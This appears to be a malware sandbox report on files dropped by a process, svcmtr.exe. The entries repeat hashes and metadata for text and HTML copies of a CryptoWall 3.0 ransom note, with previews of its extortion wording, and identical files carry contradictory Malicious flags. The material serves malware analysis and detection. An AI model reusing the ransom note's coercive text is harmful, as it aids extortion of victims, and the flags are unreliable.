                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
